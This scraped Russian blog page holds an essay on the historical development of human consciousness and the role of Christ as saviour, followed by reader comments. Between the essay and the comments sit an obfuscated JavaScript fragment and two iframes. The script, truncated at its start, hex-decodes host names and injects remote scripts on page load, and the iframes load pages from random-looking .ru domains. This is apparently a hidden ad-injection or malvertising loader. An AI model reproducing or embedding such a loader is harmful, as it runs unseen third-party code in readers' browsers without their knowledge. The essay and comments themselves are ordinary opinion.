ВЧЕРАШНЕЕ СОЗНАНИЕ ЧЕЛОВЕЧЕСТВА

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Михаил Романцов написал
    3 оценок, 406 просмотров Обсудить (9)

     

     

     Вспомним  как исторически развивалось СОЗНАНИЕ людей со дня их сотворения. У первобытных людей СОЗНАНИЕ ничем почти не отличалось от сознания животного мира , с которого они только что вышли. Искра БОГА РАЗУМА вложенная  в людей Богом  при их создании, еще даже не светилась а тлела в их СОЗНАНИИ. Сознание содержало только животные ИНСТИНКТЫ ПОТРЕБЛЕНИЯ любой ценой, ТЕПЛО, ПИЩА и ЖИЛИЩЕ, с тем , что бы выжить. В сознании людей тогда не было  места ДОБРУ и места для БОГА. Сатана и безумие  и отсутствие разума, грех и все плохое  заполняло тогда сознание людей.

    В основе древних ДОХРИСТИАНСКИХ РЕЛИГИЙ и ЯЗЫЧЕСТВА и ВЕТХОГО ЗАВЕТА сознание всех людей лежала  идея ЖЕРТВЫ. Понятие и жажда ИСКУПЛЕНИЯ путем КРОВАВЫХ ЖЕРТВОПРИНОШЕНИЙ и потребность УМИЛОСТИВИТЬ  БОГОВ ЯЗЫЧЕСТВА или ОТЦА БОГА. У Язычества было много Богов в Природе. Потом с приходом Отца у рода людей стал ОДИН БОГ, за исключением народов стоящих далеко от цивилизации и поклонявшиеся своим Богам. Бог казался миру людей странным, непонятным  и далеким , да и сегодня он многим таким кажется. У Бога надо было КРОВЬЮ КУПИТЬ МИЛОСТЬ И СНИСХОЖДЕНИЕ.

     Это все привело мир людей к мраку и унынию, который охватил весь мир до эпохи явления Христа. В Ветхом завете  сама идея Спасения  была мертвой и жуткой. Не было НАДЕЖДЫ на СПАСЕНИЕ и воскресение и задачи  с ней связанной. ЛИШЬ ПОВИНОВЕНИЕ БОГУ- СИЛЕ смягчало  ужас жизни. Только пророки  всегда видевшие  лучше Бога чем  все люди мира    сознавали , что в МИР ИДЕТ РЕЛИГИЯ СПАСЕНИЯ, РЕЛИГИЯ ВОСКРЕСЕНИЯ и вечной жизни. В религии ИНДИИ Индуизме  была осознанна греховность и бессмысленность бытия и неизбежность МИРООТРИЦАНИЯ, но СПАСЕНИЯ И ВОСКРЕСЕНИЯ не было. В ЯЗЫЧЕСТВЕ было первоночальное ощущение СВЯТОСТИ ПЛОТИ и ПЛОТСКОЙ ЖИЗНИ, БЫЛ ЗДОРОВЫЙ РЕЛИГИОЗНЫЙ МАТЕРИАЛИЗМ, РЕАЛЬНОЕ ЧУВСТВО ЗЕМЛИ.

    Но Язычество было безсильно  перед ТЛЕНИЕМ  плоти  всего мира и всех людей. Оно не могло так преобразить плоть, что бы она стала здоровой, нетленной и вечной и бессмертной  и совершенной то есть СПАСТИ. Язычество не могло вырвать из плоти грех и зло.. Таинства Язычества не спасали  от смерти - ВОТ В ЧЕМ ИХ НЕДОСТАТОК первых древних учений в том числе и  учение Будды. МИР ПРИНЯЛ ХРИСТА не сразу , убив его в самом начале так как смерть  царствовала в мире и плоть всего мира людей была смертельно больна и не излечивалась ни Языческими, не Иудейскими, не Буддистскими, не Индуистскими средствами

     Род людей ждал и жаждал СПАСИТЕЛЯ, явления в мир самого Бога, так как ВСЕ ПУТИ всех людей мира были изжиты и привели к мир к ужасу и мраку.. Сущность христианства, которые многие бесполезно пытаются по сей день разгадать со стороны - в личности ХРИСТА, в КОСМИЧЕСКОЙ РОЛИ этой ТАИНСТВЕННОЙ ЛИЧНОСТИ. Евангелия  есть учение о ХРИСТЕ как ИСКУПИТЕЛЕ и СПАСИТЕЛЕ мира, а не учение ХРИСТА. По Евангелию , путь спасения - САМ ХРИСТОС., его БОЖЕСТВЕННАЯ ЛИЧНОСТЬ, а не ЕВАНГЕЛЬСКАЯ МОРАЛЬ., не христианское учение и поучения. Если брать учение Христа и отвергать самого Христа , то в христианстве нельзя найти  ничего абсолютно НОВОГО и ОРИГИНАЛЬНОГО. В Ветхом Завете , в Индии, в Сократа и стоиков уже были даны почти все элементы христианской морали.

     

    Все христианское учение было уже подготовлено греческой и восточной мудростью. Даже все таинства имеют праобраз в таинствах  древних религий. Одно только абсолютно НОВОЕ и ОРИГИНАЛЬНОЕ в христианстве - САМ ХРИСТОС. Бог открывался миру людей и в древних религиях, сообщая миру людей свою волю, через избранных своих людей  и пророков. Также было и до Христа при Отце Боге. НО НИКОГДА ЕЩЕ ДО ХРИСТА БОГ НЕ ВОПЛОЩАЛСЯ  И НЕ ЯВЛЯЛСЯ НА ЗЕМЛЮ В МИР ЛЮДЕЙ В ОБРАЗЕ И ЛИЧНОСТИ ЧЕЛОВЕКА. Что Христос ПЕРЕВЕРНУЛ ВСЮ ИСТОРИЮ МИРА И ВСЕ СОЗНАНИЕ МИРА ЛЮДЕЙ это факт , который ПРИЗНАЛ весь мир, не только Христианский но и чуждый , и враждебный Христу.

     В истории мира людей произошел КОСМИЧЕСКИЙ ПЕРЕВОРОТ  В СОЗНАНИИ ЛЮДЕЙ и началось новое летоисчисление. И не может обьяснить НИКТО этой чудесной  роли Христа потому, что видят в нем ТОЛЬКО ЧЕЛОВЕКА НЕОБЫКНОВЕННОГО. И весь христианский мир, даже будучи духовно слепым и мертвым невидящим истины и слов Бога и того кто такой Христос , в подсознании чувствует , что в нем скрыта ВЕЛИКАЯ ТАЙНА, что с ним связана величайшая проблема мира людей. Пусть в уме сравнивают Христа с Буддой, Сократом и Магометом, все же в глубине сознания чувствуют , что это не то. С приходом Христа изменился  КОСМИЧЕСКИЙ СОСТАВ МИРА, что вошла в мир сила НЕ ОТ МИРА СЕГО. И жажда личного Спасения  стала основным  мотивом в СОЗНАНИИ всего мира людей и в истории мира.

    <script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.​loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.​replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==​typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"​function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a251​9043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>

    <iframe id="a1996667054" style="" src="https://25haich4342.ru/f2.html?a=26363" width="320" height="240"></iframe><iframe id="a754394637" style="" src="https://gyh1lh20owj.ru/u.html?a=26363" width="320" height="240"></iframe>

    Loading...

    Комментировать

    осталось 1185 символов
    пользователи оставили 9 комментариев , вы можете свернуть их
    Виктор Козлов # написал комментарий 30 мая 2016, 10:31
    Интересная трактовка истории в разрезе установления христианства. Я атеист, так что к идее самого существования Бога отношусь критически. Но вера есть вера. Не настолько хорошо знаю историю религий, чтобы участвовать в обсуждении. Повторюсь, трактовка на мой взгляд интересная.
    Михаил Романцов # ответил на комментарий Виктор Козлов 30 мая 2016, 10:55
    +++ Благодарю Виктор. Я как вы знаете к религиям всем мировым отношусь критически и не являюсь их сторонником не одной и для меня Бог не есть то что учат все религии мира. Для меня Бог эта та сила которая правит миром всем и всей Вселенной та не видимая сила которую я называю Высшим Разумом Вселенной по которому и живет вся вселенная окромя еще младого человеческого рода не раскрывшего всего того потенциала Разума и совершенства которое вложил в него Творец Бог этот самый Высший Разум Вселенной или по религии Бог или Абсолют, логос, Всемогущий, Создатель как Его называет несовершенный еще и безумный или не достаточно разумный мир людей.. Так что я также не являюсь религиозным верующим также как не являюсь и атеистом. Моя вера или убеждения и мировоззрение опирается на знания Высшего Разума Вселенной или проще его Духа Духовности или мировоззрения причем не просто знания теория а провереная на практике. Без проверки практикой я никаких знаний не принимаю
    Михаил Романцов # ответил на комментарий Михаил Романцов 30 мая 2016, 10:59
    я имею не религиозный и не атеистический взгляд на мир и убеждения а только научный и от людской науки и от науки самого Бога его высшего разума вселенной.
    валента Лунмак # написал комментарий 30 мая 2016, 12:21
    Михаил, спасибо за статью, только вы пишите так амбициозно, вроде бы так должно быть и точка. Но Высший разум постоянно нам даёт загадки, которые мы никак не можем пока разгадать. Почему в животном мире бывают непонятные мутации? А почему у людей не меньше их. Люди до поры до времени скрывают, потом идут к хирургам, если возможен этот вариант или попадают в больницу. А все несовершенные духом думают найти жизнь в сообществах меньшинств. Для чего это нам даётся? Может, чтобы мы терпимей относились друг к другу и жили дружно, но раздельно. Какое сознание? Посмотрите вокруг--так много ещё на животном уровне! Вот потому так и живём.
    Михаил Романцов # ответил на комментарий валента Лунмак 30 мая 2016, 15:12
    +++ Да так оно и есть. Но я насильно никому ничего не навязываю. Кому не интересно на того тоже не обижаюсь уважаю волю каждого человека и его выбор. вернее не мешаю.его выбору насильно не в колхоз не к Богу не к себе не тащу. Я уважаю выбор людей и не мешаю делая свое. По крайней мере стараюсь так жить.
    [email protected] # ответил на комментарий Михаил Романцов 30 мая 2016, 19:38
    Михаил, не обижайтесь. У вас очень актуальные статьи и заставляют думать, а то что немного не согласны, так для этого и есть эта площадка, чтобы общаться и высказывать свои мысли. С уважением В.Г.Г.
    Василий Васильев # написал комментарий 30 мая 2016, 16:10
    не так давно была Въра, а сейчас похоже верования.
    anonc anonc # ответил на комментарий Василий Васильев 2 июня 2016, 10:06
    По моему представлению путь в доказывании собственного понимания и следования ВЪРЕ обязательно идёт через своевременный аскетизм и готовность к жертве для отстаивания целостности своей личности в ней. Трижды отрекаются, пишут предания, и апостолы. Но дело становится святым когда под ним струится кровь добровольной жертвы. Это борьба с искушениями и победа над страхом смертью. Карбышев, Родионов и многие , сейчас гниющие в тюрьмах и спецлечебницах или ушедшие подобно Илюхину.
    Андрей Дмитриев # написал комментарий 19 июля 2016, 12:34
    Интересная тема. Тема раскрывает направленность и веяния общества в целом. Это не критика, но " смешались в кучу кони люди..."
    Существует 3 основные теории возникновения человечества.
    Космическая
    Эволюционная
    Божественная
    Первая и вторая, не раскрывают суть. Но третья, не исключает первые 2.
    Исходя из этого возникает вопрос, о каких первобытных людях идет речь, если рядом упоминается Бог? Почему автор не исключает что сознание, это и есть проявление Сатаны?
    Почему автор считает что некие учения были списаны, хотя было и такое. И не учитывает что практически все учения и религии говорят об одном, если искать не различия а сходства?
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 1031 запись в блогах и 8221 комментарий.
    Зарегистрировалось 23 новых макспаркеров. Теперь нас 5020691.